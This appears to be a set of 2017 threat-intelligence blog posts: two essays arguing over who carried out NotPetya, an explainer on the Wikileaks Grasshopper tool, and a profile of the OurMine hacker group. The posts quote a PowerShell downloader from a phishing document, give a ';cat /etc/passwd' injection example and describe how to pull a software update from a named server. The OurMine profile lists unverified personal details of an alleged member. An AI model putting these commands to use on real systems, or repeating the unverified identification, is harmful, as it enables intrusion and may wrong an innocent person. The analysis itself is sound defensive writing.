NotPetya 2– Telebotz Attribution

This work was done in my free time with my own resources. Imagine what we could do with a team!

The Case For Nation State Attribution
Jonathan Nichols
04 JULY 2017

Executive Summary

Compelling data has been collected which demonstrates that the actor group Telebotz (Sandworm, Energetic Bear, or BlackEnergy) is behind the #NotPetya (Petya, exPetya, ExPetr, GoldenEye, Nyetya, Diskcoder.C) attack.

Details

Analysts at ESET have painted a compelling picture which demonstrates that the #NotPetya attacks were conducted by the same actors behind the DarkEnergy attacks against the Ukrainian power grid. This analysis uses inductive reasoning and probability to paint a compelling picture. The similarities between the DarkEnergy actors and the NotPetya actors are uncanny to such a degree that it is unlikely that any other actor group could have, accidentally or intentionally, conducted the attack with such striking similarity.

Yesterday I wrote a blog post detailing how public details of the NotPetya attack were not sufficient to point to an APT. Those facts have changed as of today, July 4^th, ESET has published a fantastic report which should remove all but the most cynical of skpetics. Telebotz did NotPetya.

A Note on Terminology

The Information Security industry has a problem with terminology. Attackers, Viruses, and methodologies are frequently given different names by each industry group as these defenders vie for supremacy in marketing wars. This is an unfortunate state of affairs. Alas, until a NIST standard exists for uniform adversary naming, we must live in the world we’ve got, not the one we wish to inhabit (But seriously NIST, you’re dropping the ball here). For this report, I am calling this specific attack “NotPetya” to be in line with the most important policy authorities I wish this report to reach (NATO) and I’m labeling the actors “Telebots” to be in line with the analysts who conducted the bulk of the research I will be drawing on for this report. In an attempt to be exhaustive (and in a shameless grab at Search Engine Optimization), here is a current list of known industry names for the attackers and the methodologies:

NotPetya: Petya, exPetya, ExPetr, GoldenEye, Nyetya, Diskcoder.C

Telebots: Sandworm, Energetic Bear*, BlackEnergy*

(*source documents vary on whether Telebots/Sandworm are closely related or identical to the BlackEnergy/Energetic Bear group)

A Note on Analysis

It is relatively simple for a complex adversary to pretend to be an idiot, and it is impossible for an idiot to pretend to be a complex adversary. Due to this immutable fact, it is always good to start with the premise that the hacker you’re analyzing is an idiot. When facts demonstrate this premise to be false, revise the analysis up the food chain until you’ve found a sufficiently complex level of capability to fit the facts. To do otherwise invites trouble for the analyst and the organizations they support. Since all attacks done by idiots can also be done by experts, any analysis which presupposes that the attackers are experts becomes fallacious on its face. You cannot DISPROVE an attack was done by a professional, you can only prove that a professional must have done an attack. A begets B, but B does not always beget A.

Timeline of Events

December 2015	BlackEnergy (related to Telebotz) disrupts Ukrainian power grid
December 2016	KillDisk malware against Ukrainian financials, first instance of fake ransomware use by Telebotz to mask a wiper
January 2017	First instance of VPN tunnels used to spread botnet
January? 2017	Telebot incorporate password stealer, Mimikatz, and PsExec
14March 09:30 2017	PetrWrap (Filecoder.NKH) report from Kaspersky. Uses nearly identical ransom screen
14April 2017	Backdoor ZvitPublishedObject.dll in MeDoc Update owned by Telebots
24APR-10MAY 2017	No known backdoors present in MeDoc
15May 2017	New Backdoor compiled (Filecoder.AESNI.C aka XData)
15May 2017	Backdoor ZvitPublishedObject.dll in MeDoc Update owned by Telebots
17May-21June 2017	No known backdoors present in MeDoc
18May 2017	Publish of Filecoder.AESNI.C (few infections due to lack of backdoor)
22June 2017	New Backdoor compiled? (wording unclear)
22June 2017	Backdoor ZvitPublishedObject.dll in MeDoc Update owned by Telebots
27June 10:30 UTC 2017	MEDoc update spreads NotPetya (Discoder.C)

The timeline above demonstrates a clear evolution in capabilities from early 2016 until today. Early on, Telebotz is overserved developing the techniques to use fake ransomware to hide a wiper. They then develop the techniques to spread their viruses over VPN tunnels, incorporate password stealers, Mimikatz, PsExec, and compromise the MeDocs Update process. All of these techniques are present in the NotPetya attack.

Finding one such technique used by a separate hacking group would be a case of correlation. Finding two would be lucky. Finding so many correlating techniques which fit into a timeline that demonstrates a clear evolution in capabilities? Nature is rarely so beautiful as to grace humanity with that level of coincidence.

As this report was being written, the Ukrainian Cyber Police came to the same conclusion. Like me, they borrow heavily from the wonderful work of the people at ESET. (Source: http://itc.ua/news/glava-kiberpolitsii-ukrainyi-zayavil-chto-razrabotchiki-m-e-doc-znali-problemah-s-bezopasnostyu-zadolgo-ataki-virusa-petya-a-i-mogut-ponesti-ugolovnuyu-otvetstvennost-za-halatnost/)

If you see ESET at a conference, be sure to buy them a beer and thank them for their service to the Western world.

Sources:
https://www.welivesecurity.com/2017/06/30/telebots-back-supply-chain-attacks-against-ukraine/
https://www.welivesecurity.com/2017/07/04/analysis-of-telebots-cunning-backdoor/
https://securelist.com/petrwrap-the-new-petya-based-ransomware-used-in-targeted-attacks/77762/
https://securelist.com/schroedingers-petya/78870/

NOTE: I’m doing this on my own free time and without assistance. Please forgive and alert me to any errors, both factual and editorial. If you want a Threat Intelligence analyst on your team, just drop me a line. I would have been happy to have shared this work with a team, with an editor, and under the banner of a team logo.

NotPetya – So Easy Anyone Could Do It

This work was done in my free time with my own resources. Imagine what we could do with a team!

The Case Against Nation State Attribution
Jonathan Nichols
03 JULY 2017

“Never attribute to malice that which is adequately explained by stupidity” – Hanlon’s Razor

Executive Summary

The NATO Cooperative Cyber Defence Center of Excellence states that the NotPetya malware spread through drive-by exploits, compromised software updates, and email phishing attacks. To date, the principal compelling reason for security researchers to believe that the NotPetya attacks were conducted by a nation state relates to the use of M.E.Doc automatic software updates in order to seed the NotPetya virus. Outside of this element, researchers have demonstrated multiple elements of this attack which are amateurish, or otherwise unlike behavior typically seen in nation state level threats. New evidence suggests that the malicious abuse of M.E.Doc would be trivial for non-state actors. This report attempts to review NATO’s claim that the attacks are likely to be attributed to a nation state actor by tackling the known public evidence about each of these attack vectors. While many of NATO’s claims are disputed by community experts, the claims are taken here with the seriousness one should give an entity that could trigger Article 5 (war).

NATO Claim – Drive by, Software Updates, and Phishing

The NATO Cooperative Cyber Defence Centre of Excellence (CCD COE) states that the “global outbreak of NotPetya malware on 27 June 2017 […] can most likely be attributed to a state actor.” (Source: https://ccdcoe.org/notpetya-and-wannacry-call-joint-response-international-community.html) The CCD COE report of 30 June 2017 cites the attack as “complex and expensive enough” to not have been a non-state actor, and that the ransom collected would have not covered the cost of the operation.

NATO states that the NotPetya malware spread through drive-by exploits, compromised software updates, and email phishing attacks. Of these attack vectors, most security researchers highlight the compromised software updates as being evidence of nation state involvement.

Compromised Software Updates – So Easy Anyone Could Do It

Ukrainian Cyber Police have published that at about 10:30 am GMT Tuesday (27 July 2017) M.E.Doc software on client machines ran a routine automatic update. At that time, the service EZVit.exe connected to address 92.60.184.55 with User Agent “medoc1001189” and downloaded 333 kilobytes of data (Source: https://www.facebook.com/cyberpoliceua/posts/536947343096100). This event was the initial virus download.

Hacking 92.60.184.55

Further analysis of 92.60.184.55 show that, at the time of this writing (03 JULY 2017 at 0948 EST) the server at 92.60.184.55 has the following services open:

Port 21 – ProFTPD Version 1.3.4c
Port 22 – OpenSSH Version 5.4p1
Port 80 – ngnix Version 1.2.7

(Source: https://www.shodan.io/host/92.60.184.55)

Notably, this ProFTPD software is vulnerable to CVE-2015-3306 which allows for trivial exploitation to read and write files to the hard drive. (source: https://www.cvedetails.com/cve/CVE-2015-3306/). This exploit is also a Metasploit module. Further testing or forensics would be necessary to ensure that this was the vulnerability used, and this analysis is not attempting to claim with any certainty that CVE-2015-3306 was definitively the malicious attack vector. Nonethless, the trivial nature of this attack is such that any hacker with rudimentary capabilities could exploit it if the mod_copy was enabled. With trivial access to write to the hard drive, a rudimentary hacker could re-write files without difficulty.

Have to hack it to be sure 😉 the out of date software still isn't a good sign.

— Hacker Fantastic (@hackerfantastic) July 3, 2017

The potentiality for trivial attacks is not limited just to this exploit. Multiple exploits exist for all of these services, and any number of them could have been used by non-state actors with little to no experience in hacking. The publicly known vulnerabilities for the open ports are as follows:
ProFTPD: https://www.cvedetails.com/product/16873/Proftpd-Proftpd.html?vendor_id=9520
OpenSSH: http://www.cvedetails.com/vulnerability-list/vendor_id-97/product_id-585/Openbsd-Openssh.html
ngnix: http://www.cvedetails.com/vulnerability-list/vendor_id-10048/product_id-17956/Nginx-Nginx.html

Getting the Clients to Download the Virus

In the course of this investigation, it was discovered that simply sending an HTTP GET request to 92.60.184.55 on port 80 with the User Agent “medoc1001189” will result in the server sending a “download” file. This strongly suggests that no authentication was/is required by M.E.Doc software to receive updates. It is probable that any file downloaded in this manner will be executed by the M.E.Doc auto-updater. In this manner, simply writing a virus to the download file may result in the execution of the virus on any M.E.Doc client machine.

This M.E.Doc Updater doesn't exactly take a Nation State to poke at….Here, let me show you with a short video! pic.twitter.com/GesKd6XZ2Z

— Jonathan Nichols (@wvualphasoldier) July 3, 2017

Compromised Software Updates – Conclusion

The attack, as described by security researchers, NATO, and Ukrainian Cyber Police, is not sufficiently complex to have necessarily been conducted by a nation state actor. To the contrary, the techniques described above use tools standard in Kali Linux, a free operating system favored as an introductory hacker toolkit.

Drive-by Attack

The Drive-by attack described by NATO CCD COE best matches the description of NotPetya being delivered via a fake Microsoft Windows update pop up on bahmut.com.ua/news. (Source: https://news.zepko.com/petya-ransomware-cyberattack-on-european-businesses-and-infrastructure/). While some security experts disagree, the website owners themselves have stated that the website utilized a malicious pop-up (http://bahmut.com.ua/news/incidents/4936-vecherniy-bahmut-tozhe-postradal-ot-hakerskoy-ataki.html). Pop ups are routinely blocked by most modern browsers and are not the preferred infection vector for advanced drive-by actors. Further, fake Windows updates in pop-up browser windows is behavior not typically associated with the advanced actors. This behavior is usually observed in actors with a criminal motive in malvertising campaigns which tend to target illicit video streaming services. Advanced actors would likely attempt more successful browser infections, and would resist the use of this type of pop up. This attack, like the software update attack, betrays the work of an unskilled hacker, and not the work of a nation state.

Phishing

The Phishing attack described by the NATO CCD COE best matches the description of phishing emails delivering the NotPetya virus through a Word document attachment (Source: https://support.threattracksecurity.com/support/solutions/articles/1000251572-goldeneye-peyta-technical-analysis). Again, some security experts dispute this claim (https://gist.github.com/vulnersCom/65fe44d27d29d7a5de4c176baba45759). Taking NATO at their word, this attack appears to use Order-20062017.doc to leverage CVE-2017-0199, which calls the following Powershell “PowerShell -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile(‘hxxp://french-cooking.com/myguy.exe’, ‘C:\Documents and Settings\Administrator\Application Data\[random_number.exe’);”

Researchers have complained that this research is not replicatable. This is potentially because french-cooking.com is no longer accessible. As of this writing, respectable research organizations such as Booz Allen Hamilton (https://www.boozallen.com/content/dam/boozallen_site/sig/pdf/white-paper/rollup-of-booz-allen-petya-research.pdf) assess myguy.exe to be a potential dropper for NotPetya. Should this analysis change, it only reduces the complexity of the NotPetya attack. A reduction in complexity will only further reduce the probability that the attack is the work of a nation state.

Regardless, the threattracksecurity report is the only professional report which matches the details of the NATO CCD COE report. Threattracksecurity has published the following phishing email:

“TO: target.emailName
FROM: Random_Name@outlook.com
REPLY-TO: christian.malcharzik@gmail.com

ATTACHMENT: Order-20062017.doc
BODY:

Hello target.emailName,
You will be billed $ 2,273.42 on your Visa card momentarily.
Go through attachment to avoid it.
Password is ex. 6089, 6088

With appreciation!
Prince”

This phishing email is rudimentary, at best. There are no hallmarks here of advanced phishing techniques, and no indication that the email specifically targeted any user. To the contrary, the use of automated variables is indicative of a rudimentary hacker and betrays none of the qualities expected from nation state level adversaries.

The NotPetya Virus – Malice or Idiocy?

Much has been made about the fact that the NotPetya virus appears to have been designed as a wiper, and not as a genuine piece of ransomware. The virus also checks for avp.exe (Kaspersky Antivirus) and then wipes the bootsector of any device with the file present. (Source: https://www.boozallen.com/content/dam/boozallen_site/sig/pdf/white-paper/rollup-of-booz-allen-petya-research.pdf) In the course of running, the virus wipes the Master Boot Record, reboots the machine, encrypts the machine, writes a decryption key to readme.txt file on the C drive, then displays a ransom message.

That part came from @msuiche's blog.

— Jonathan Nichols (@wvualphasoldier) July 3, 2017

Yeap or if the routine to replace the MBR fails. But even if replaces the actual new MBR is just fake.

— Matthieu Suiche (@msuiche) July 3, 2017

The ransom message itself contains a decryption key which is entirely randomly generated and not the encryption key created in readme.txt! The virus either accidentally or maliciously writes over its own ability to decrypt itself. This behavior is being attributed to malice on part of the designer. However, what has been attributed to malice could just as easily be attributed to poor coding. Why would a coder write one ransom message and decryption key to readme.txt and then generate a random fake decryption key for an entirely new ransom message to be displayed to the user? This duplication of effort is not the sign of a professional nation state adversary. It is entirely plausible, and within the confines of Hanlon’s Razor, that the actors are so amateur as to not to know the ransomware module they used already wrote a ransom message to readme.txt. Further, the specific targeting of Kaspersky Antivirus hearkens back to the vindictive nature of low level cyber criminals, such as those which famously write hate messages to Kaspersky and Brian Krebs regularly.

$10,000 – Not Enough Cash to be Worth the Effort?

As of this writing, the Bitcoin wallet used for this attack contains $10,092.15, or 3.99 BTC at the current exchange rate (Source: https://blockchain.info/address/1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX). While this is not a significant windfall for nation state actors, it would be a sizable return for an actor observed using only a few days’ worth of effort and a handful of known vulnerabilities. Without evidence of sufficient technical complexity, it seems inappropriate to assess $10,000 for a weekend’s worth of work as “Not worth it” to any moderately capable individual or small group. This is especially true if the actor comes from a country with a low GDP.

Conclusions

There is not sufficient evidence in the current publicly available corpus of knowledge to state that this attack must have been conducted by a nation state actor. No publicly known data point demonstrates a demand for skills above those of a 400 lb hacker with a small amount of cash and a copy of Kali Linux.

However, the inability to find data which confirms that the attack was necessarily a nation state does not preclude the possibility that the attack was a nation state. It is relatively simple for a complex adversary to pretend to be an idiot, and it is impossible for an idiot to pretend to be a complex adversary. Complexity in future reports may, over time and with more robust forensics, demonstrate that this was an APT. However, at this time, there is not sufficient public data to prove that is the case.

Stories are running rampant that NATO is debating whether to consider this attack and act of war. (Source: http://gizmodo.com/nato-considering-petya-malware-potential-act-of-war-1796590694) We should urge moderation and accuracy in our analysis. I, for one, have a distaste for wars started on faulty premises.

-Jon (@WvuAlphaSoldier)

BONUS FLOW CHART! (Seriously, I need a copy of Visio….)

What is Grasshopper? -A Wikileaks Vault7 Story

It’s that time again. Wikileaks has published another set of documents allegedly stolen from the CIA. This time, the documents detail the use of a tool named Grasshopper. Lets try to get ahead of the media cycle and explain, in plain English, what Grasshopper is.

“Grasshopper appears to be a .exe builder which simplifies the process of identifying and deploying malicious code on a target machine.”

Source: https://wikileaks.org/vault7/document/Grasshopper-v2_0_2-UserGuide/page-6/#pagination

What does that mean? Essentially, Grasshopper automates the process of developing an executable file which will run on a victim machine. This isn’t special. Any child hacker will know that Metasploit will do this for you, for free, without having to join the CIA or anything! If you’re so inclined, you can totally pretend you’re a superspy, here: https://www.offensive-security.com/metasploit-unleashed/binary-payloads/

Building an executable by hand is tough, but with an executable builder, it’s super easy! Just pick the victim from a list, identify what is running on the victim machine, and a menu will guide you through the process of identifying the right Vulnerabilities, Exploits, and Payloads you can use against that machine. It’s Hacking for Dummies! No more messy “learning how to code” needed!

To go into detail, we gotta get technical. I have to explain to you a bit about the fundamentals of malware. For malware to work, you need to have a Vulnerability, an Exploit, and a Payload.

Vulnerability: A flaw in a piece of code. These are usually accidentally introduced by programmers. After one too many late night coding sections, a coder inadvertently misplaces a semi-colon, or forgets to sanitize a user input. Lets say a programmer for some server made a user login page without any basic sanity checks and it looks kinda like this:

Technical bits:
UserInput{
$USERNAME&&$PASSWORD
SUBMIT;
}

(Note to coders: I know! Don’t write me. Trying to keep this basic.)

Exploit: This is the code that leverages the vulnerability. Lets look at the above function. A hacker may write a script that takes advantage of the lack of input sanitation. Instead of entering the user name, the hacker may write something like ;cat /etc/passwd. Let me break it down:

Technical bits:
; = “ESCAPE!”
cat = “DISPLAY”
/etc/passwd = “the file containing all the passwords for this machine.”

So when that UserInput function above is ran….the computer sees:
USERINPUT…ESCAPE!…. DISPLAY PASSWORD FILE.

Next thing you know, the hacker has your password file.

Payload
This is the part that most people traditionally think of as “malware.” This could be nearly anything, and is somewhat dependent on the type of vulnerability. A vulnerability which allows for root level remote code execution can run most anything, a vulnerability which only allows a hacker to read the contents of memory won’t allow for any code execution. If the vulnerability allows for local code execution, you can execute the payload locally (while sitting at the machine). If the vulnerability allows for remote code execution, you can run the payload remotely against the vulnerable machine sitting on the internet. A hacker’s payload could be wipers (things that erase a hard drive, like what the Iranians have been deploying against the Saudis), ransomware (famously being deployed against hospitals), trojans (used to allow a hacker to gain remote access), keyloggers (usually deployed by parents or jealous former lovers), or even just everyday spambots (used to try to sell you garbage).

SO YOU WANNA BE A HACKER SPY….

1) Apply at CIA.gov
2) Go through years of rigorous training
3) Pass an insane background check
4) Get specialized training for Grasshopper
5) Deploy to a crappy part of the world
6) Find a target machine
7) Identify what is running on that machine
8) Using a set of easily navigated menus, use Grasshopper to select what type of Windows machine the victim has, then select a vulnerability likely to work against the victim, then select what kind of payload you want to run on the machine. Save a copy of Totally_Not_Spying.exe
9) Sneak in and run Totally_Not_Spying.exe on the target machine
10) Try to escape without getting charged for espionage and beheaded by some cut-rate dictator

OR….just watch this Youtube video:

That’s right kids! All the functionality Wikileaks just told you the CIA has…..yep…you have it to. Just download Metasploit and follow one of the innumerable guides posted on YouTube and, just like that, you’ve skipped all that difficult polygraph stuff the CIA would have made you do!

A note on Wikileaks

Thus far, Wikileaks’ #Vault7 dumps have failed to impress. No one should be surprised that the CIA hacks targets. Most Americans would rightly be upset if the CIA stayed in the stone age.

I continue to wait for Wikileaks to demonstrate something spectacular. Do they have evidence that the CIA engages in bulk data collection? Do they have evidence that the CIA has been holding onto critical bugs (like a heartbleed level vulnerability?) No? Or maybe they do, but haven’t published it yet. THOSE would be notable. To date, Wikileaks has only demonstrated that spies sometimes spy. This isn’t remarkable, and neither are the techniques they’ve demonstrated, to date.

Until next time! Bye for now!

-Jonathan Nichols
@WvuAlphaSoldier

Our Mine Team

(Originally Authored on July 27th, 2016)

Much media has been attention to “OurMine Team” a group of hackers who have been on a recent hacking spree of high profile accounts. Those attacked include Daniel Ek, (CEO of Spotify), Mark Zuckerberg, Channing Tatum, former Twitter CEOs Dick Costolo and Ev Williams, Twitter co-founder Biz Stone, and YouTubers Pewdiepie, Merkiplier, Dadmau5, and David Guetta. The group claims to be security researchers who are hacking these accounts to demonstrate vulnerabilities. The group has setup a website at ourmine.org/services/ which sell services for $30 to $5,000.

This group is well known to researchers. The group was founded in 2014 as a group of low level Saudi Arabian hackers playing on the OurMine Minecraft forums. The group gained attention in July, 2015 when they conducted DDoS attacks against a number of financial intuitions. Before then, @Our_Mine was known for taking over the accounts of gamers, stealing over 2,000 Euros worth of PS4 FIFA coins (used for in-game purchases). The group is believed to be relatively unskilled. In 2015, the group was observed on HackForum.net attempting to pay for Instagram account takeovers. The group is believed to likely be using off the shelf low level hacking tools in their attacks.

The group also has a “theme song” of considerable production quality, which can be found here: https://www.youtube.com/watch?v=pU6Nq1aYmLA. The song appears to have been sung by Lindee Link, a song writer from Georgia, USA.

The following is unverified PII for the OneMine Team

Related Accounts:

http://twitter.com/Our_Mine //

http://twitter.com/ourmine_team //

https://twitter.com/TheOurMineTeam //

Member: Snake

Name: Abdulhakeem Zatar

Instagram: https://www.instagram.com/zatar96/

Youtube: https://www.youtube.com/user/TheSnakeReloaded

IMAGE: https://pbs.twimg.com/media/CJk1-rNWcAA6TGu.png

Twitter: https://www.twitter.com/Zatar_96

Whois information: http://whois.domaintools.com/our-mine.org Admin Name: OurMine Snake